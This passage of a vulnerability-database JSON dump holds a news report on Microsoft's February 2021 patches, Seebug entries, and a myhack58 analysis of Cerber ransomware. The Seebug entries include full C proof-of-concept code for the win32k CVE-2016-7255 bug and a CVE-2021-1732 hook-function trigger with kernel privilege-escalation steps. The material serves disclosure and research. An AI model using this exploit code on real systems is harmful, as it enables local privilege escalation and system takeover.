(CVE-2021-1732, CVSS score 7.8) that allows attackers with access to a target system to run malicious code with elevated permissions. Microsoft credited JinQuan, MaDongZe, TuXiaoYi, and LiHao of DBAPPSecurity for discovering and reporting the vulnerability.\n\nIn a separate technical write-up, the researchers said a zero-day exploit leveraging the flaw was detected in a \"very limited number of attacks\" against victims located in China by a threat actor named Bitter APT. 
The attacks were discovered in December 2020.\n\n\"This zero-day is a new vulnerability which caused by win32k callback, it could be used to escape the sandbox of Microsoft [Internet Explorer] browser or Adobe Reader on the latest Windows 10 version,\" DBAPPSecurity researchers [said](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>). \"The vulnerability is high quality and the exploit is sophisticated.\"\n\nIt's worth noting that Adobe, as part of its February patch, [addressed](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) a critical buffer overflow flaw in Adobe Acrobat and Reader for Windows and macOS (CVE-2021-21017) that it said could lead to arbitrary code execution in the context of the current user.\n\nThe company also warned of active exploitation attempts against the bug in the wild in limited attacks targeting Adobe Reader users on Windows, mirroring aforementioned findings from DBAPPSecurity.\n\nWhile neither Microsoft nor Adobe has provided additional details, the concurrent patching of the two flaws raises the possibility that the vulnerabilities are being chained to carry out the in-the-wild attacks.\n\n### Netlogon Enforcement Mode Goes Into Effect\n\nMicrosoft's Patch Tuesday update also resolves a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-24078), .NET Core, and Visual Studio (CVE-2021-26701), Microsoft Windows Codecs Library (CVE-2021-24081), and Fax Service (CVE-2021-1722 and CVE-2021-24077).\n\nThe RCE in Windows DNS server component is rated 9.8 for severity, making it a critical vulnerability that, if left unpatched, could permit an unauthorized adversary to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nMicrosoft is also taking this month to push second round of fixes for the 
[Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) flaw (CVE-2020-1472) that was originally resolved in August 2020, following which [reports of active exploitation](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) targeting unpatched systems emerged in September 2020.\n\nStarting February 9, the domain controller \"[enforcement mode](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>)\" will be [enabled by default](<https://support.microsoft.com/help/4557222#EnablingEnforcementMode>), thus blocking \"vulnerable [Netlogon] connections from non-compliant devices.\"\n\nIn addition, the Patch Tuesday update rectifies two information disclosure bugs \u2014 one in Edge browser for Android (CVE-2021-24100) that could have revealed personally identifiable information and payment information of a user, and the other in Microsoft Teams for iOS (CVE-2021-24114) that could have exposed the Skype token value in the preview URL for images in the app.\n\n### RCE Flaws in Windows TCP/IP Stack\n\nLastly, the Windows maker released a set of fixes affecting its TCP/IP implementation \u2014 consisting of two RCE flaws (CVE-2021-24074 and CVE-2021-24094) and one denial of service vulnerability (CVE-2021-24086) \u2014 that it said could be exploited with a DoS attack.\n\n\"The DoS exploits for these CVEs would allow a remote attacker to cause a stop error,\" Microsoft [said](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) in an advisory. \"Customers might receive a blue screen on any Windows system that is directly exposed to the internet with minimal network traffic. 
Thus, we recommend customers move quickly to apply Windows security updates this month.\"\n\nThe tech giant, however, noted that the complexity of the two TCP/IP RCE flaws would make it hard to develop functional exploits. But it expects attackers to create DoS exploits much more easily, turning the security weakness into an ideal candidate for exploitation in the wild.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-02-10T04:44:00", "type": "thn", "title": "Microsoft Issues Patches for In-the-Wild 0-day and 55 Others Windows Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-21017", 
"CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-24100", "CVE-2021-24114", "CVE-2021-26701"], "modified": "2021-02-15T11:58:01", "id": "THN:0C87C22B19E7073574F7BA69985A07BF", "href": "https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:45", "description": "If the Windows kernel-mode drivers do not properly handle objects in memory, multiple elevation of privilege vulnerabilities result. An attacker who successfully exploits this vulnerability can run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe attacker must first log on to the system. The attacker could then run a specially crafted application that exploits these vulnerabilities and takes control of the affected system. The update addresses the vulnerabilities by correcting how the Windows kernel-mode driver handles objects in memory.\n", "cvss3": {}, "published": "2016-11-10T00:00:00", "type": "seebug", "title": "Win32k elevation of privilege vulnerability (MS16-135) (CVE-2016-7255)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92530", "id": "SSV:92530", "sourceData": "\n // \u53c2\u8003 https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... 
);\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n\r\n do \r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n\r\n va_start(VaList,Format);\r\n\r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n\r\n va_end(VaList);\r\n\r\n } while (FALSE);\r\n\r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n\r\n return ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n\r\n\r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n\r\n\r\n int nFinalRet = -1;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n\r\n Sleep(1000);\r\n\r\n }\r\n\r\n\r\n 
_sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n\r\n return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n\r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n\r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n\r\n do \r\n {\r\n\r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n\r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n\r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n\r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n\r\n #ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n\r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n\r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n\r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n SetParent(hWndChild , GetDesktopWindow() );\r\n\r\n SetForegroundWindow(hWndChild);\r\n\r\n _sim_alt_shift_tab(4);\r\n\r\n SwitchToThisWindow(hWndChild , TRUE);\r\n\r\n _sim_alt_shift_esc();\r\n\r\n\r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n\r\n\r\n } while (FALSE);\r\n\r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n\r\n if ( NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n 
hWndChild = NULL;\r\n }\r\n\r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n return 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do \r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92530", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-08-26T20:38:29", "description": "# CVE-2021-1732: win32kfull xxxCreateWindowEx callback out-of-bounds\n\nMar 25, 2021 \u2022 iamelli0t\n\nCVE-2021-1732 is a 0-Day vulnerability exploited by the BITTER APT\norganization in one operation which was disclosed in February this\nyear[1][2][3]. This vulnerability exploits a user mode callback opportunity in\nwin32kfull module to break the normal execution flow and set the error flag of\nwindow object (tagWND) extra data, which results in kernel-space out-of-bounds\nmemory access violation.\n\n## Root cause analysis\n\nThe root cause of CVE-2021-1732 is: \nIn the process of creating window (CreateWindowEx), when the window object\ntagWND has extra data (tagWND.cbwndExtra != 0), the function pointer of\nuser32!_xxxClientAllocWindowClassExtraBytes saved in\nntdll!_PEB.kernelCallbackTable (offset+0x58) in user mode will be called via\nthe nt!KeUserModeCallback callback mechanism, and the system heap allocator\n(ntdll!RtlAllocateHeap) is used to allocate the extra data memory in user-\nspace. \nBy hooking user32!_xxxClientAllocWindowClassExtraBytes function in user mode,\nand modifying the properties of the window object extra data in the hook\nfunction manually, the kernel mode atomic operation of allocating memory for\nextra data can be broken, then the out-of-bounds read/write ability based on\nthe extra data memory is achieved finally. 
\n\n\nThe normal flow of the window object creation (CreateWindowEx) process is\nshown as follows (partial): \n \n\n\nFrom the above figure, we can see that: when the window extra data size\n(tagWND.cbWndExtra) is not 0, win32kfull!xxxCreateWindowEx calls the user mode\nfunction user32!_xxxClientAllocWindowClassExtraBytes via the kernel callback\nmechanism, requests for the memory of the window extra data in user-space.\nAfter allocation, the pointer of allocated memory in user-space will be\nreturned to the tagWND.pExtraBytes property: \n \n\n\nHere are two modes of saving tagWND extra data address (tagWND.pExtraBytes): \n[Mode 1] **In user-space system heap** \nAs the normal process shown in the figure above, the pointer of extra data\nmemory allocated in user-space system heap is saved in tagWND.pExtraBytes\ndirectly. \nOne tagWND memory layout of Mode 1 is shown in the following figure: \n \n\n\n[Mode 2] **In kernel-space desktop heap** \nThe function ntdll!NtUserConsoleControl allocates extra data memory in kernel-\nspace desktop heap by function DesktopAlloc, calculates the offset of\nallocated extra data memory address to the kernel desktop heap base address,\nsaves the offset to tagWND.pExtraBytes, and modifies tagWND.extraFlag |=\n0x800: \n \n\n\nOne tagWND memory layout of Mode 2 is shown in the following figure:\n \n\n\nSo we can hook the function user32!_xxxClientAllocWindowClassExtraBytes in\nuser-space, call NtUserConsoleControl manually in hook function to modify the\ntagWND extra data storage mode from Mode 1 to Mode 2, call\nntdll!NtCallbackReturn before the callback returns: \n \n\n\nThen return the user mode controllable offset value to tagWND.pExtraBytes\nthrough ntdll!NtCallbackReturn, and realize the controllable offset out-of-\nbounds read/write ability based on the kernel-space desktop heap base address\nfinally. 
\n\n\nThe modified process which can trigger the vulnerability is shown as follows: \n \n\n\nAccording to the modified flowchart above, the key steps of triggering this\nvulnerability are explained as follows: \n\n 1. Modify the user32!_xxxClientAllocWindowClassExtraBytes function pointer in PEB.kernelCallbackTable to a custom hook function.\n 2. Create some normal window objects, and leak the user-space memory addresses of these tagWND kernel objects through user32!HMValidateHandle.\n 3. Destroy part of the normal window objects created in step 2, and create one new window object named 'hwndMagic' with the specified tagWND.cbwndExtra. The hwndMagic can probably reuse the previously released window object memory. Therefore, by searching the previously leaked window object user-space memory addresses with the specified tagWND.cbwndExtra in the custom hook function, the hwndMagic can be found before CreateWindowEx returns.\n 4. Call NtUserConsoleControl in the custom hook function to modify the tagWNDMagic.extraFlag with flag 0x800.\n 5. Call NtCallbackReturn in the custom hook function to assign a fake offset to tagWNDMagic.pExtraBytes.\n 6. Call SetWindowLong to write data to the address of kernel-space desktop heap base address + specified offset, which can result in out-of-bounds memory access violation.\n\nAn implementation of the hook function is demonstrated as follows: \n\n\n\u200b \n\n void* WINAPI MyxxxClientAllocWindowClassExtraBytes(ULONG* size) {\n \n \tdo {\n \t\tif (MAGIC_CBWNDEXTRA == *size) {\n \t\t\tHWND hwndMagic = NULL;\n \t\t\t//search from freed NormalClass window mapping desktop heap\n \t\t\tfor (int i = 2; i < 50; ++i) {\n \t\t\t\tULONG_PTR cbWndExtra = *(ULONG_PTR*)(g_pWnd[i] + _WND_CBWNDEXTRA_OFFSET);\n \t\t\t\tif (MAGIC_CBWNDEXTRA == cbWndExtra) {\n \t\t\t\t\thwndMagic = (HWND)*(ULONG_PTR*)(g_pWnd[i]);\n \t\t\t\t\tprintf(\"[+] bingo! 
find &hwndMagic = 0x%llx in callback :) \\n\", g_pWnd[i]);\n \t\t\t\t\tbreak;\n \t\t\t\t}\n \t\t\t}\n \t\t\tif (!hwndMagic) {\n \t\t\t\tprintf(\"[-] Not found hwndMagic, memory layout unsuccessfully :( \\n\");\n \t\t\t\tbreak;\n \t\t\t}\n \n \t\t\t// 1. set hwndMagic extraFlag |= 0x800\n \t\t\tCONSOLEWINDOWOWNER consoleOwner = { 0 };\n \t\t\tconsoleOwner.hwnd = hwndMagic;\n \t\t\tconsoleOwner.ProcessId = 1;\n \t\t\tconsoleOwner.ThreadId = 2;\n \t\t\tNtUserConsoleControl(6, &consoleOwner, sizeof(consoleOwner));\n \n \t\t\t// 2. set hwndMagic pExtraBytes fake offset\n \t\t\tstruct {\n \t\t\t\tULONG_PTR retvalue;\n \t\t\t\tULONG_PTR unused1;\n \t\t\t\tULONG_PTR unused2;\n \t\t\t} result = { 0 };\t\t\n \t\t\t//offset = 0xffffff00, access memory = heap base + 0xffffff00, trigger BSOD\t\n \t\t\tresult.retvalue = 0xffffff00;\t\t\t\n \t\t\tNtCallbackReturn(&result, sizeof(result), 0);\n \t\t}\n \t} while (false);\n \n \treturn _xxxClientAllocWindowClassExtraBytes(size);\n }\n\n\nBSOD snapshot: \n \n\n\n## Exploit analysis\n\nFrom Root cause anaysis, we can see that: \n**\" An opportunity to read/write data in the address which calculated by the\nkernel-space desktop heap base address + specified offset\"** can be obtained\nvia this vulnerability.\n\n\nFor the kernel mode exploitation, the attack target is to obtain system token\ngenerally. A common method is shown as follows: \n\n 1. Exploit the vulnerability to obtain a arbitrary memory read/write primitive in kernel-space.\n 2. Leak the address of some kernel object, find the system process through the EPROCESS chain.\n 3. Copy the system process token to the attack process token to complete the privilege escalation job.\n\nThe obstacle is step 1: How to exploit **\" An opportunity to read/write data\nin the address which calculated by the kernel-space desktop heap base address\n\n+ specified offset\"** to obtain the arbitrary memory read/write primitive in\n kernel-space. 
\n\nOne solution is shown in the following figure: \n \n\n\n 1. The offset of tagWNDMagic extra data (wndMagic_extra_bytes) is controllable via the vulnerability, so we can use SetWindowLong to modify the data in specified address calculated by desktop heap base address + controllable offset.\n 2. Use the vulnerability ability to modify tagWNDMagic.pExtraBytes to the offset of tagWND0 (the offset of tagWND0 is obtained by tagWND0+0x8), call SetWindowLong to modify tagWND0.cbWndExtra = 0x0fffffff to obtain a tampered tagWND0.pExtraBytes which can achieve read/write out-of-bounds.\n 3. Calculate the offset from tagWND0.pExtraBytes to tagWND1, call SetWindowLongPtr to replace the spMenu of tagWND1 with a fake spMenu by the tampered tagWND0.pExtraBytes, realize the arbitrary memory read ability with the help of fake spMenu and function GetMenuBarInfo. \n The logic of GetMenuBarInfo to read the data in specified address is shown as\n follows, the 16 bytes data is stored into MENUBARINFO.rcBar structure:\n  \n\n\n 4. Use the tampered tagWND0.pExtraBytes to modify tagWND1.pExtraBytes with specified address, and use the SetWindowLongPtr of tagWND1 to obtain the arbitrary memory write ability.\n 5. After obtaining the arbitrary memory read/write primitive, we need to leak a kernel object address in desktop heap to find EPROCESS. Fortunately, when setting the fake spMenu for tagWND1 in step 3, the return value of SetWindowLongPtr is the kernel address of original spMenu, which can be used directly.\n 6. Finally, find the system process by traversing the EPROCESS chain, and copy the system process token to the attack process to complete the privilege escalation job. 
This method is relatively common, so will not be described in detail.\n\nThe final privilege escalation demonstration: \n \n\n\n## References\n\n[1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732 \n[2] https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-\nzero-day-exploit-is-used-by-bitter-apt-in-targeted-attack-cn/ \n[3]\nhttps://www.virustotal.com/gui/file/914b6125f6e39168805fdf57be61cf20dd11acd708d7db7fa37ff75bf1abfc29/detection \n[4] https://en.wikipedia.org/wiki/Privilege_escalation", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T00:00:00", "type": "seebug", "title": "Microsoft Windows\u672c\u5730\u63d0\u6743\u6f0f\u6d1e\uff08CVE-2021-1732\uff09", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-03-26T00:00:00", "id": "SSV:99168", "href": "https://www.seebug.org/vuldb/ssvid-99168", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2017-03-23T07:22:58", "edition": 2, "description": "0x1 Foreword\n\n360 Internet Security Center recently 
captured a\u201cceber\u201dblackmailer Trojan variants, the variants with other\u201cceber\u201dblackmailer Trojan variants in the code The execution flow and not too big difference. Only it is worth noting that the Trojan exploit CVE-2016-7255 privilege elevation vulnerability on its own. right. This article will analyze the blackmailer for CVE-2016-7255 privilege elevation vulnerability in the use of the process.\n\n0x2 vulnerability details\n\nThe problem code is in win32k! xxxNextWindow, due to the lack of the necessary checks directly to the tagWND+0xC0 members offset 0x28 corresponding to the address of the value with 4 or operation, and tagWND+0xC0 is controllable, which leads to arbitrary address write. The vulnerable code is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417778. png)\n\nFigure 1 vulnerable code\n\nFig. v12 shows is tagWND structure, the structure as shown in omitted section.\n\n! [](/Article/UploadPic/2017-3/201732314417810. png)\n\nFigure 2 tagWND structure of the body\n\nFrom the above figure it can be seen, tagWND+0xC0 corresponds spmenu members, if there is a user state function can be the member of the assignment, you can trigger any address write. For 32-bit systems, you can directly call the SetWindowLong function SetWindowLong function will call the kernel mode function NtUserSetWindowLong the completion of this function; for 64-bit systems, does not exist you can use the user state function, but you can use the syscall of the way to call the kernel mode function NtUserSetWindowLong or function NtUserSetWindowLongPtr to complete this work. The following description is NtUserSetWindowLong function, NtUserSetWindowLongPtr the function execution process is the same.\n\nNtUserSetWindowLong function is just a shell, it will pass the parameter to the xxxSetWindowLong and call it, the function is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417836. 
png)\n\nFigure 3 xxxSetWindowLong function\n\nIn this function, the incoming nIndex judgment, and according to the nIndex value to perform the corresponding operation. For nIndex value of -16, and -20, and -12, and-21 situation, will call xxxSetWindowData function for processing. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417404. png)\n\nFigure 4 call xxxSetWindowData function for processing\n\nThe function receives xxxSetWindowLong of the parameters, when the nIndex parameter is-12 out of GWL_ID, and the operation of the window style is WS_CHILD or WS_CHILDWINDOW\uff080x40000000, will be the operation window tagWND structure spmenu members of the value set to dwNewLong it. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417349. png)\n\nFigure 5 The trigger of the position of vulnerability\n\nSince dwNewLong is to call NtUserSetWindowLong function when parameters are passed, the user mode process can use the syscall feel free to control it. And win32k! xxxNextWindow function of spmenu+0x28 members of With 4 or operation, thus triggering the arbitrary address write.\n\n0x3 exploit analysis\n\nFrom the vulnerability detail can be seen, the user mode process have to tagWND structure spmenu members the right to amend, the member is a tagMENU structure body, the structure is defined as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417245. png)\n\nFigure 6 tagMENU structure of the body\n\nNot difficult to see, xxxNextWindow function to modify the value is spmenu the fFlags member of the offset 0x28, and since the members with 0x4 or operation, and therefore the vulnerability can only be modified 1bit size of the area.\n\nYou can only modify 1bit on the surface it looks seemingly of little value, however this Trojan variant is not only to focus on this 1bit, but transferred to the tagWND structure of the cbWNDExtra member that represents the window the additional data size. 
If you can pass the Modify window the additional data size to cover the key address, and then re-use other way to write data, you can achieve perfect utilization.\n\nThen to complete the cbWNDExtra member of the write operation, it must obtain the cbWNDExtra member of the address or is the cbWNDExtra member relative to a known address offset. Except you must also obtain the additional address of the data or is relative to a known address offset to be calculated and written. For obtaining the cbWNDExtra member of the address, the Trojan creates two window\u201cExtraWnd1\u201dand\u201cExtraWND2\u201d, and the two Windows differs in its window class. cbWndExtra member that corresponds exactly to the tagWND the cbWNDExtra member. The program will be two window class. cbWndExtra members were assigned to 0x118 and 0x130, as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417654. png)\n\nFigure 7 create two Windows\n\nCreate a window after is to get the cbWNDExtra member of the tagWND structure of the offset, using HMValidateHandle function. The function and not in user mode export, but there's a user mode function IsMenu call it. Trojan horse determined by IsMenu related byte code of the location acquisition HMValidateHandle address.\n\n! [](/Article/UploadPic/2017-3/201732314417116. png)\n\nFigure 8 The use of byte-code positioning function\n\nHMValidateHandle function will leak tagWND structure of the content, so the Trojan can easily locate the cbWNDExtra member of the tagWND structure of the offset. For insurance purposes, the Trojan determines the two window tagWND structure of the cbWNDExtra member of the offset, when the two cbWNDExtra to register the window class to set the value of the 0x118 and 0x130 and offset are the same before the description of the offset effective.\n\n! [](/Article/UploadPic/2017-3/201732314417591. 
png)\n\n**[1] [[2]](<84568_2.htm>) [[3]](<84568_3.htm>) [next](<84568_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-23T00:00:00", "type": "myhack58", "title": "\u201ccerber\u201dblackmailer for CVE-2016-7255 exploit analysis-exploit warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2017-03-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/84568.htm", "id": "MYHACK58:62201784568", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-01T14:57:29", "edition": 2, "description": "The Windows kernel mention the right Vulnerability, CVE-2016-7255 has been a lot of media attention. In the 11 month's Patch Tuesday, Microsoft released for this vulnerability fix, as MS16-135 announcement of the part. According to Microsoft's description, CVE-2016-7255 mainly used to perform targeted attacks, and by some of the\u201cwild way\u201dto find samples. 
